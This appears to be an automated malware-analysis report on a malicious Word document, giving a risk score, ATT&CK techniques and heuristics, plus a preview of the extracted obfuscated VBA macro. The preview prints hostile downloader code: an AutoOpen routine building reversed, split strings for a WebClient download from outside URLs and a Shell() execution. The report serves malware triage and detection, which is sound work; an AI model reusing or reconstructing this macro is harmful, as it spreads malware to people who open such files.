MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The Autoopen macro is present and a critical heuristic indicates the use of the Shell() function, suggesting an attempt to execute arbitrary commands. The macro code is heavily obfuscated, making it difficult to determine the exact payload or destination, but the presence of the Shell() call is a strong indicator of malicious intent.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 137834 bytes |
SHA-256: c016ed25bc3ec4bbfa5d5ccf22bcc32e53de80b1835559d8e493084cc78f5727 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "rdDSmpfqaDQY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ZpLErQ(JsQGF)
SzNSA = jdWCc
wZlDAw = mjjXMU + CDbl(73044 - PwbMH - zYnBv + CDbl(1868)) - 25848 - CDbl(20421)
DnjIu = lGrRXS
lbBwO = 6488
End Sub
Sub ivpVW(BwBFzV)
QdkdLr = isjvjG
nLzzmK = oIzNlz + CDbl(79699 - FlUBqF - rYmWb + CDbl(75105)) - 74308 - CDbl(21345)
lQUNnB = LLicU
PZumrm = 96320
hPXfTb = PiGBz
bVcbw = dIqId + CDbl(75661 - IMcpv - NTDAwi + CDbl(37584)) - 50079 - CDbl(94071)
dcaXln = RKsjU
rHtrQ = 35821
nsLBki = Ujtfd
NNjCPS = IKfCQ + CDbl(86381 - MtCqD - wIkRZ + CDbl(75057)) - 4076 - CDbl(30479)
lRNFnF = brbzzq
NIlrhL = 51984
End Sub
Sub CcWiEc(dcQFY)
NoKFv = SLOFJI
XInvUE = IPljE + CDbl(632 - MOwhs - EzTal + CDbl(73116)) - 57182 - CDbl(16623)
nWMaa = GphwB
QwDbB = 91373
GwQXRq = XoMKia
pcOXi = wFZRlr + CDbl(4203 - AQzkqz - VXzuj + CDbl(99967)) - 64217 - CDbl(33641)
XNaPaW = DWVjAX
maolWY = 25398
End Sub
Sub Autoopen()
On Error Resume Next
rczUE = dvaPo
uXQmOi = wNVNCw + CDbl(47443 - TuOKs - zWzRG + CDbl(33669)) - 49645 - CDbl(51097)
vULaEP = BXszR
WPvVj = 5300
ZAKOqSA (ALEvh + BoXpINiVkY + BSVIMB)
lasqY = zJtrR
wkziWk = XRbjQQ + CDbl(86230 - NrjPf - vbwWFw + CDbl(22655)) - 10196 - CDbl(675)
UmAjM = kwXbi
JrcZf = 25472
End Sub
Sub RMbmwC(DMRnZ)
QUOdP = vMHhs
SrRFt = RwVjut + CDbl(397 - jCwXh - CMnocz + CDbl(19414)) - 42467 - CDbl(35039)
Jijij = rwSlW
whaVdO = 55277
OjzIBF = dcuVv
wZPJRV = LzFwM + CDbl(52661 - GOHVv - aIZiah + CDbl(51109)) - 15394 - CDbl(27606)
YQbuz = KLLsH
OiDwap = 95097
UYZBG = zlikuN
ihfljS = EvKClt + CDbl(89638 - aiHlKA - zrZoH + CDbl(16319)) - 48811 - CDbl(55745)
wujkzY = tWzKY
WQMvE = 19418
End Sub
Sub dJCzd(nLsLpi)
iErKK = CTNOKp
lVJcME = Yworl + CDbl(13847 - kzALK - FfRYBk + CDbl(10845)) - 14854 - CDbl(69896)
vrHAw = CQwlP
kPAYDj = 34098
End Sub
Attribute VB_Name = "MDAKWFDlac"
Sub Hoitzi(SRwkN)
PLvBX = hWpPCs
wirPRp = mIFBW + CDbl(1336 - wQzYcp - vKJBNz + CDbl(89838)) - 54223 - CDbl(33796)
jBIib = CfurmH
tfXik = 12043
End Sub
Function BoXpINiVkY()
On Error Resume Next
raCPAU = NEsbKq
VUsLVo = shwooE + CDbl(30775 - pOKVb - FzshHu + CDbl(79913)) - 51897 - CDbl(5065)
cQZYK = WPRtwt
bMQRq = 27674
vqdSi = AAItW
Xcdqa = uKOion + CDbl(34171 - ThIai - qYXDU + CDbl(18206)) - 35114 - CDbl(47558)
crBZvI = QqsTYJ
QBqBi = 87545
btWzfMZ = ombRc("Kke//:0BO+0BOp0BO'+'+0BOtth 0BO+0BO VB00BO+0BO 0BO+0BO= XCDAW8C0BO+'+'0BO;)33120BO+0BO82zLa%", 37547 + 5 - 37547, 37547 + 86 - 37547)
riPNf = FZVRPW
lnnNW = fQShKl + CDbl(63567 - GBiIn - ilImMQ + CDbl(18208)) - 66655 - CDbl(82836)
bECwW = OdijOC
BEbwi = 97203
YEFwzk = jtEmP
nnElJj = sNlnFW + CDbl(14821 - UTsRp - RaSbG + CDbl(4777)) - 20259 - CDbl(69758)
jYzWj = ZnLoEi
TRtcd = 8923
vUmpviOb = ombRc("IIlxUK/ku.oc.0BO+0BOt0BO+0BOfos0BO+0BOegami/0BO+0BO/:0BO+0BOptth@/'+'0BO+0BOd4ojLj/0BO'+'+0BOed0BO+0BO.0BO+0BOepp0BO+0BOurg0BO+0BO-y0BO+0BOs0BO+0BOaOYLP1", 45162 + 6 - 45162, 45162 + 146 - 45162)
aLUab = NlKDj
IrBOI = bIujh + CDbl(55513 - ZGGAhd - FUuYD + CDbl(43731)) - 88924 - CDbl(19821)
ncIHoa = SCkcB
UudrqC = 30468
wGzim = mJpomo
NPUJQ = zZHstI + CDbl(27046 - JoOCcq - Tjiuz + CDbl(34047)) - 795 - CDbl(76591)
KSZFco = jEoNrr
DWYwd = 39464
zGnPfmZS = ombRc("CaO0+VB0xe.VB00BO+0BO( + 0BO+0BOBSN0BO+0BOW0BO+0BO8C0BO+0BO 0BO+0BO+0BO+0NW9c%", 12796 + 6 - 12796, 12796 + 71 - 12796)
mJwEtj = PTLwlO
biIHVG = wocVcS + CDbl(58331 - YSWTR - JaAjE + CDbl(90685)) - 31970 - CDbl(70656)
OFcjcn = rINso
VjQQI = 83864
AIVCz = dzzCJ
RETYaH = jbROQd + CDbl(63668 - jfruO - ClIrJ + CDbl(47566)) - 33635 - CDbl(239)
sCTsb = HDBOU
djuFZ = 34845
LfkcQRBfwv = ombRc("afhe0B'+'O+0BOi0BO+0BOlCbeW.teN.0BO+0BOm'+'0BO+0BOetsy0BO+0BOS )VB0tcejb0BO'+'+0BOo-VB0BLljIN3", 89786 + 7 - 89786, 89786 + 85 - 89786)
uRGHu = PTLjQ
ijUYLw = Fjcbpj + CDbl(88600 - YBOlk - LGpmu + CDbl(46690)) - 54315 - CDbl(22099)
wWk
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.